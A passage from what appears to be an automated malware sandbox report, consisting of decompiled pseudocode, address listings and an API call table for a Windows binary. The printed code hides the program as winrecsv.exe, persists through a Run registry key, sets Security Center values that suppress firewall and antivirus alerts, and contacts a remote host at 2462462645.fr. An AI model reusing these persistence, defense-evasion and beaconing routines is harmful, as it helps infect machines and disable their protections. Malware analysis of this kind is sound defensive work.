                                                                                  							}
                                                                                  						}
                                                                                  						_v2664 = 0x1388;
                                                                                  						_v2648 = 0x1f4;
                                                                                  						while(_v2664 > _v2648) {
                                                                                  							_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
                                                                                  							if(_v2696 != 0) {
                                                                                  								Sleep(0x7d0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								Sleep(0x1388);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2648 = _v2648 + 1;
                                                                                  							}
                                                                                  						}
                                                                                  						if(PathFileExistsA("aefafugaugfgauegf") != 0) {
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						}
                                                                                  						_v2652 = FindWindowA("aefyaiegfayegfg", 0);
                                                                                  						if(_v2652 != 0) {
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							SetForegroundWindow(_v2644);
                                                                                  							ShowWindow(_v2644, 1);
                                                                                  							Sleep(0x3a98);
                                                                                  							MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  						}
                                                                                  						_v2700 = 0;
                                                                                  						while(_v2700 < 0xfa0) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x2328);
                                                                                  							MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
                                                                                  							_v2700 = _v2700 + 1;
                                                                                  						}
                                                                                  						goto L40;
                                                                                  					}
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					Sleep(0x1388);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					Sleep(0xbb8);
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  					Sleep(0xbb8);
                                                                                  					if(_v2656 == 0) {
                                                                                  						L15:
                                                                                  						InternetCloseHandle(_v2656);
                                                                                  						DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  						goto L16;
                                                                                  					}
                                                                                  					_v2688 = 0;
                                                                                  					while(_v2688 < 0x7d0) {
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0x7d0);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  						Sleep(0xfa0);
                                                                                  						_v2688 = _v2688 + 1;
                                                                                  					}
                                                                                  					goto L15;
                                                                                  				}
                                                                                  				_t182 = CreateMutexA(0, 0, "984658"); // executed
                                                                                  				_v2640 = _t182;
                                                                                  				if(GetLastError() != 0xb7) {
                                                                                  					_v1064 = 0;
                                                                                  					_v528 = 1;
                                                                                  					GetModuleFileNameW(0, "C:\Windows\winrecsv.exe", 0x105);
                                                                                  					_v532 = PathFindFileNameW("C:\Windows\winrecsv.exe");
                                                                                  					wsprintfW( &_v524, L"%s:Zone.Identifier", "C:\Windows\winrecsv.exe");
                                                                                  					_t447 = _t446 + 0xc;
                                                                                  					DeleteFileW( &_v524); // executed
                                                                                  					ExpandEnvironmentStringsW(L"%userprofile%",  &_v2636, 0x104);
                                                                                  					_v3104 = L"winrecsv.exe";
                                                                                  					_v3108 = _v532;
                                                                                  					while(1) {
                                                                                  						_t190 = _v3108;
                                                                                  						_t367 =  *_t190;
                                                                                  						_v3110 = _t367;
                                                                                  						if(_t367 !=  *_v3104) {
                                                                                  							break;
                                                                                  						}
                                                                                  						if(_v3110 == 0) {
                                                                                  							L48:
                                                                                  							_v3116 = 0;
                                                                                  							L50:
                                                                                  							_v3120 = _v3116;
                                                                                  							if(_v3120 == 0) {
                                                                                  								L67:
                                                                                  								Sleep(0x1f4); // executed
                                                                                  								_t191 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center", 0, 0x20006,  &_v1064); // executed
                                                                                  								if(_t191 == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4); // executed
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4); // executed
                                                                                  									RegCloseKey(_v1064); // executed
                                                                                  								}
                                                                                  								_t193 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Security Center\\Svc", 0, 0x20006,  &_v1064); // executed
                                                                                  								if(_t193 == 0) {
                                                                                  									RegSetValueExA(_v1064, "FirewallOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "FirewallDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiSpywareOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                  									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                  									RegCloseKey(_v1064);
                                                                                  								}
                                                                                  								Sleep(0x1f4); // executed
                                                                                  								_t194 = E0040B4A0(); // executed
                                                                                  								if((_t194 & 0x000000ff) != 0) {
                                                                                  									__imp__#115(0x202,  &_v3100); // executed
                                                                                  									wsprintfW("C:\Users\frontdesk\tnnodes.dat", L"%s\\tnnodes.dat",  &_v2636);
                                                                                  									wsprintfW("C:\Users\frontdesk\tncmds.dat", L"%s\\tncmds.dat",  &_v2636);
                                                                                  									CreateThread(0, 0, E00404000, 0, 0, 0); // executed
                                                                                  									Sleep(0x1f4); // executed
                                                                                  									CreateThread(0, 0, E004050B0, 0, 0, 0); // executed
                                                                                  									Sleep(0x1f4); // executed
                                                                                  									CreateThread(0, 0, E00405900, 0, 0, 0); // executed
                                                                                  									Sleep(0x2710); // executed
                                                                                  									E00404200(); // executed
                                                                                  									_t203 = E0040D3D0(); // executed
                                                                                  									E004057B0(_t203,  &_v2636); // executed
                                                                                  									 *0x414e64 = CreateEventA(0, 1, 0, 0); // executed
                                                                                  									_t206 = E0040ABD0( &_v2636); // executed
                                                                                  									 *0x414e6c = _t206;
                                                                                  									 *0x414e68 = E0040BEA0( &_v2636); // executed
                                                                                  									E0040A020(); // executed
                                                                                  									_t413 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t413, 0, E0040C360, 0, 0, 0); // executed
                                                                                  									_t210 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t210, 0, E0040C2C0, 0, 0, 0); // executed
                                                                                  									_t371 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t371, 0, E0040BE50, 0, 0, 0); // executed
                                                                                  									_t414 =  *0x414e68; // 0x930628
                                                                                  									E0040BF50(_t414, 0, E0040BC50, 0, 0, 0); // executed
                                                                                  								}
                                                                                  								return 0;
                                                                                  							}
                                                                                  							if((E0040D4A0() & 0x000000ff) != 1) {
                                                                                  								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                  								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, L"winrecsv.exe");
                                                                                  								_t454 = _t447 + 0x10;
                                                                                  								if(CopyFileW(?str?,  &_v1588, 0) == 0) {
                                                                                  									L60:
                                                                                  									Sleep(0x1f4);
                                                                                  									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, L"winrecsv.exe");
                                                                                  									_t447 = _t454 + 0x10;
                                                                                  									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                  										goto L67;
                                                                                  									}
                                                                                  									SetFileAttributesW( &_v1060, 3);
                                                                                  									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  										L65:
                                                                                  										_t253 = E0040D740( &_v1060);
                                                                                  										_t447 = _t447 + 4;
                                                                                  										if((_t253 & 0x000000ff) != 1) {
                                                                                  											goto L67;
                                                                                  										}
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v3140 =  &_v1060;
                                                                                  									_v3144 = _v3140 + 2;
                                                                                  									do {
                                                                                  										_v3146 =  *_v3140;
                                                                                  										_v3140 = _v3140 + 2;
                                                                                  									} while (_v3146 != 0);
                                                                                  									_v3152 = _v3140 - _v3144 >> 1;
                                                                                  									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3152 + _v3152 + 2);
                                                                                  									RegCloseKey(_v1064);
                                                                                  									goto L65;
                                                                                  								}
                                                                                  								SetFileAttributesW( &_v1588, 3);
                                                                                  								if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                  									L58:
                                                                                  									_t264 = E0040D740( &_v1588);
                                                                                  									_t454 = _t454 + 4;
                                                                                  									if((_t264 & 0x000000ff) != 1) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									ExitProcess(0);
                                                                                  								}
                                                                                  								_v3124 =  &_v1588;
                                                                                  								_v3128 = _v3124 + 2;
                                                                                  								do {
                                                                                  									_v3130 =  *_v3124;
                                                                                  									_v3124 = _v3124 + 2;
                                                                                  								} while (_v3130 != 0);
                                                                                  								_v3136 = _v3124 - _v3128 >> 1;
                                                                                  								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3136 + _v3136 + 2);
                                                                                  								RegCloseKey(_v1064);
                                                                                  								goto L58;
                                                                                  							}
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  						_t190 = _v3108;
                                                                                  						_t397 =  *((intOrPtr*)(_t190 + 2));
                                                                                  						_v3112 = _t397;
                                                                                  						_t86 = _v3104 + 2; // 0x6e0069
                                                                                  						if(_t397 !=  *_t86) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v3108 = _v3108 + 4;
                                                                                  						_v3104 = _v3104 + 4;
                                                                                  						if(_v3112 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						goto L48;
                                                                                  					}
                                                                                  					asm("sbb eax, eax");
                                                                                  					asm("sbb eax, 0xffffffff");
                                                                                  					_v3116 = _t190;
                                                                                  					goto L50;
                                                                                  				}
                                                                                  				ExitProcess(0);
                                                                                  			}































































                                                                                  0x00405a2e
                                                                                  0x00405a34
                                                                                  0x00405a3e
                                                                                  0x00405a48
                                                                                  0x00405a61
                                                                                  0x00405a67
                                                                                  0x00405a74
                                                                                  0x004061cb
                                                                                  0x004061d4
                                                                                  0x00000000
                                                                                  0x004061d4
                                                                                  0x00405a7f
                                                                                  0x00405a8f
                                                                                  0x00405a9f
                                                                                  0x00405ab2
                                                                                  0x00405abf
                                                                                  0x00405ac6
                                                                                  0x00405ad6
                                                                                  0x00405ad6
                                                                                  0x00405ae1
                                                                                  0x00405ae7
                                                                                  0x00405b02
                                                                                  0x00405b13
                                                                                  0x00405b23
                                                                                  0x00405b2e
                                                                                  0x00405b39
                                                                                  0x00405b49
                                                                                  0x00405b59
                                                                                  0x00405b64
                                                                                  0x00405b6f
                                                                                  0x00405afc
                                                                                  0x00405afc
                                                                                  0x00405b7f
                                                                                  0x00405b8f
                                                                                  0x00405b9a
                                                                                  0x00405baa
                                                                                  0x00405bb5
                                                                                  0x00405bc0
                                                                                  0x00405bcb
                                                                                  0x00405be4
                                                                                  0x00405bef
                                                                                  0x00405bfc
                                                                                  0x00405cf4
                                                                                  0x00405cf9
                                                                                  0x00405d06
                                                                                  0x00405d11
                                                                                  0x00405d20
                                                                                  0x00405d2d
                                                                                  0x00405d3d
                                                                                  0x00405d43
                                                                                  0x00405d4d
                                                                                  0x00405d63
                                                                                  0x00405d73
                                                                                  0x00405d83
                                                                                  0x00405d8e
                                                                                  0x00405d9e
                                                                                  0x00405da9
                                                                                  0x00405db4
                                                                                  0x00405dc7
                                                                                  0x00405de0
                                                                                  0x00405ded
                                                                                  0x00405dfd
                                                                                  0x00405e0d
                                                                                  0x00405e2d
                                                                                  0x00405e3a
                                                                                  0x00405e41
                                                                                  0x00405e4c
                                                                                  0x00405e57
                                                                                  0x00405e67
                                                                                  0x00405e72
                                                                                  0x00405e7d
                                                                                  0x00405e7d
                                                                                  0x00405e8a
                                                                                  0x00405e95
                                                                                  0x00405e95
                                                                                  0x00405ea2
                                                                                  0x00405ead
                                                                                  0x00405eba
                                                                                  0x00405ec9
                                                                                  0x00405ed4
                                                                                  0x00405ee1
                                                                                  0x00405eec
                                                                                  0x00405f05
                                                                                  0x00405f12
                                                                                  0x00405f32
                                                                                  0x00405f3f
                                                                                  0x00405f4b
                                                                                  0x00405f56
                                                                                  0x00405f61
                                                                                  0x00405f61
                                                                                  0x00405f6e
                                                                                  0x00405f79
                                                                                  0x00405f81
                                                                                  0x00405f91
                                                                                  0x00405f9c
                                                                                  0x00405fac
                                                                                  0x00405fb7
                                                                                  0x00405fb7
                                                                                  0x00405fc4
                                                                                  0x00405fc4
                                                                                  0x00405eba
                                                                                  0x00405fca
                                                                                  0x00405fd4
                                                                                  0x00405fde
                                                                                  0x00405ff9
                                                                                  0x00406006
                                                                                  0x0040600d
                                                                                  0x00406018
                                                                                  0x00406028
                                                                                  0x00406033
                                                                                  0x0040603e
                                                                                  0x0040604d
                                                                                  0x0040604d
                                                                                  0x00406053
                                                                                  0x00406062
                                                                                  0x00406069
                                                                                  0x00406074
                                                                                  0x0040607f
                                                                                  0x0040608a
                                                                                  0x00406095
                                                                                  0x004060a0
                                                                                  0x004060ab
                                                                                  0x004060b6
                                                                                  0x004060c1
                                                                                  0x004060d1
                                                                                  0x004060d1
                                                                                  0x004060e4
                                                                                  0x004060f1
                                                                                  0x004060f8
                                                                                  0x00406105
                                                                                  0x00406114
                                                                                  0x0040611f
                                                                                  0x0040612f
                                                                                  0x0040613a
                                                                                  0x00406145
                                                                                  0x00406150
                                                                                  0x0040615b
                                                                                  0x00406166
                                                                                  0x00406166
                                                                                  0x0040616c
                                                                                  0x00406187
                                                                                  0x0040619d
                                                                                  0x004061a8
                                                                                  0x004061b3
                                                                                  0x004061c3
                                                                                  0x00406181
                                                                                  0x00406181
                                                                                  0x00000000
                                                                                  0x00406187
                                                                                  0x00405c07
                                                                                  0x00405c17
                                                                                  0x00405c22
                                                                                  0x00405c2d
                                                                                  0x00405c38
                                                                                  0x00405c43
                                                                                  0x00405c63
                                                                                  0x00405c6e
                                                                                  0x00405c7b
                                                                                  0x00405cdc
                                                                                  0x00405ce3
                                                                                  0x00405cee
                                                                                  0x00000000
                                                                                  0x00405cee
                                                                                  0x00405c7d
                                                                                  0x00405c98
                                                                                  0x00405cae
                                                                                  0x00405cb9
                                                                                  0x00405cc9
                                                                                  0x00405cd4
                                                                                  0x00405c92
                                                                                  0x00405c92
                                                                                  0x00000000
                                                                                  0x00405c98
                                                                                  0x004061e8
                                                                                  0x004061ee
                                                                                  0x004061ff
                                                                                  0x00406209
                                                                                  0x00406213
                                                                                  0x00406229
                                                                                  0x0040623a
                                                                                  0x00406251
                                                                                  0x00406257
                                                                                  0x00406261
                                                                                  0x00406278
                                                                                  0x0040627e
                                                                                  0x0040628e
                                                                                  0x00406294
                                                                                  0x00406294
                                                                                  0x0040629a
                                                                                  0x0040629d
                                                                                  0x004062ad
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062b7
                                                                                  0x004062ee
                                                                                  0x004062ee
                                                                                  0x00406305
                                                                                  0x0040630b
                                                                                  0x00406318
                                                                                  0x00406581
                                                                                  0x00406586
                                                                                  0x004065a4
                                                                                  0x004065ac
                                                                                  0x004065cb
                                                                                  0x004065ea
                                                                                  0x00406609
                                                                                  0x00406628
                                                                                  0x00406647
                                                                                  0x00406666
                                                                                  0x00406685
                                                                                  0x00406692
                                                                                  0x00406692
                                                                                  0x004066b0
                                                                                  0x004066b8
                                                                                  0x004066d7
                                                                                  0x004066f6
                                                                                  0x00406715
                                                                                  0x00406734
                                                                                  0x00406753
                                                                                  0x00406772
                                                                                  0x00406791
                                                                                  0x0040679e
                                                                                  0x0040679e
                                                                                  0x004067a9
                                                                                  0x004067af
                                                                                  0x004067b9
                                                                                  0x004067cb
                                                                                  0x004067e2
                                                                                  0x004067fc
                                                                                  0x00406814
                                                                                  0x0040681f
                                                                                  0x00406834
                                                                                  0x0040683f
                                                                                  0x00406854
                                                                                  0x0040685f
                                                                                  0x00406865
                                                                                  0x0040686a
                                                                                  0x0040686f
                                                                                  0x00406882
                                                                                  0x00406887
                                                                                  0x0040688c
                                                                                  0x00406896
                                                                                  0x0040689b
                                                                                  0x004068ad
                                                                                  0x004068b4
                                                                                  0x004068c9
                                                                                  0x004068cf
                                                                                  0x004068e4
                                                                                  0x004068eb
                                                                                  0x00406900
                                                                                  0x00406907
                                                                                  0x0040690c
                                                                                  0x00000000
                                                                                  0x00406913
                                                                                  0x00406329
                                                                                  0x00406344
                                                                                  0x00406362
                                                                                  0x00406368
                                                                                  0x00406381
                                                                                  0x00406460
                                                                                  0x00406465
                                                                                  0x00406483
                                                                                  0x00406489
                                                                                  0x004064a2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004064b1
                                                                                  0x004064d7
                                                                                  0x00406562
                                                                                  0x00406569
                                                                                  0x0040656e
                                                                                  0x00406577
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040657b
                                                                                  0x0040657b
                                                                                  0x004064e3
                                                                                  0x004064f2
                                                                                  0x004064f8
                                                                                  0x00406501
                                                                                  0x00406508
                                                                                  0x0040650f
                                                                                  0x00406527
                                                                                  0x0040654f
                                                                                  0x0040655c
                                                                                  0x00000000
                                                                                  0x0040655c
                                                                                  0x00406390
                                                                                  0x004063b6
                                                                                  0x00406441
                                                                                  0x00406448
                                                                                  0x0040644d
                                                                                  0x00406456
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040645a
                                                                                  0x0040645a
                                                                                  0x004063c2
                                                                                  0x004063d1
                                                                                  0x004063d7
                                                                                  0x004063e0
                                                                                  0x004063e7
                                                                                  0x004063ee
                                                                                  0x00406406
                                                                                  0x0040642e
                                                                                  0x0040643b
                                                                                  0x00000000
                                                                                  0x0040643b
                                                                                  0x0040632d
                                                                                  0x0040632d
                                                                                  0x004062b9
                                                                                  0x004062bf
                                                                                  0x004062c3
                                                                                  0x004062d0
                                                                                  0x004062d4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062d6
                                                                                  0x004062dd
                                                                                  0x004062ec
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004062ec
                                                                                  0x004062fa
                                                                                  0x004062fc
                                                                                  0x004062ff
                                                                                  0x00000000
                                                                                  0x004062ff
                                                                                  0x00406203

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001B58), ref: 00405A2E
                                                                                  • FindWindowA.USER32 ref: 00405A61
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405A7F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A8F
                                                                                  • MoveFileA.KERNEL32 ref: 00405A9F
                                                                                  • FindWindowA.USER32 ref: 00405AAC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AC6
                                                                                  • MoveFileA.KERNEL32 ref: 00405AD6
                                                                                  • Sleep.KERNEL32(000003E8), ref: 00405AE1
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B13
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 00405B23
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405B2E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B39
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B49
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B59
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405B64
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405B6F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405B7F
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405B8F
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405B9A
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405BAA
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405BB5
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BC0
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405BCB
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405BDE
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405BEF
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405C07
                                                                                  • MoveFileA.KERNEL32 ref: 00405C17
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405C22
                                                                                  • DeleteFileW.KERNEL32(ffag8f2g8fg82g8f8g8fg), ref: 00405C2D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C38
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405C43
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405C5D
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 00405C6E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405CAE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CB9
                                                                                  • MoveFileA.KERNEL32 ref: 00405CC9
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405CD4
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405CE3
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405CEE
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405CF9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405D06
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405D11
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00405D20
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405D2D
                                                                                  • MoveFileA.KERNEL32 ref: 00405D3D
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D83
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405D8E
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405D9E
                                                                                  • Sleep.KERNEL32(000007D0), ref: 00405DA9
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405DB4
                                                                                  • FindWindowA.USER32 ref: 00405DC1
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405DDA
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405DFD
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405E0D
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405E27
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405E41
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405E4C
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00405E57
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,argarhrharharfafrahth), ref: 00405E67
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405E72
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405E7D
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405E8A
                                                                                  • Sleep.KERNEL32(00000DAC), ref: 00405E95
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405EA2
                                                                                  • Sleep.KERNEL32(00000FA0), ref: 00405EAD
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00405EC9
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405ED4
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00405EE1
                                                                                  • Sleep.KERNEL32(00001388), ref: 00405EEC
                                                                                  • InternetOpenA.WININET(ttyu8ruy8uy8u8yu,00000000,00000000,00000000,00000000), ref: 00405EFF
                                                                                  • InternetOpenUrlA.WININET(00000000,http://2462462645.fr/,00000000,00000000,00000000,00000000), ref: 00405F2C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405F4B
                                                                                  • Sleep.KERNEL32(00002710), ref: 00405F56
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00405F61
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405F6E
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F79
                                                                                  • Sleep.KERNEL32(00000064), ref: 00405F81
                                                                                  • MoveFileA.KERNEL32 ref: 00405F91
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00405F9C
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00405FAC
                                                                                  • DeleteFileA.KERNEL32(2dgd828d8g8fg8g8g), ref: 00405FB7
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC4
                                                                                  • FindWindowA.USER32 ref: 00405FF3
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040600D
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406018
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 00406028
                                                                                  • Sleep.KERNEL32(00001388), ref: 00406033
                                                                                  • Sleep.KERNEL32(00001388), ref: 0040603E
                                                                                  • PathFileExistsA.SHLWAPI(aefafugaugfgauegf), ref: 0040605A
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 00406069
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406074
                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040607F
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040608A
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406095
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060A0
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060AB
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060B6
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060C1
                                                                                  • MoveFileW.KERNEL32(4yy4w4yw4fwgwgw,ffag8f2g8fg82g8f8g8fg), ref: 004060D1
                                                                                  • FindWindowA.USER32 ref: 004060DE
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004060F8
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 00406105
                                                                                  • ShowWindow.USER32(00000000,00000001), ref: 00406114
                                                                                  • Sleep.KERNEL32(00003A98), ref: 0040611F
                                                                                  • MoveFileA.KERNEL32 ref: 0040612F
                                                                                  • DeleteFileA.KERNEL32(579795729858927452784), ref: 0040613A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406145
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 00406150
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 0040615B
                                                                                  • DeleteFileW.KERNEL32(argarhargafafargh), ref: 00406166
                                                                                  • MoveFileW.KERNEL32(argarhargafafargh,argarhrharharfafrahth), ref: 0040619D
                                                                                  • DeleteFileW.KERNEL32(4yy4w4yw4fwgwgw), ref: 004061A8
                                                                                  • Sleep.KERNEL32(00002328), ref: 004061B3
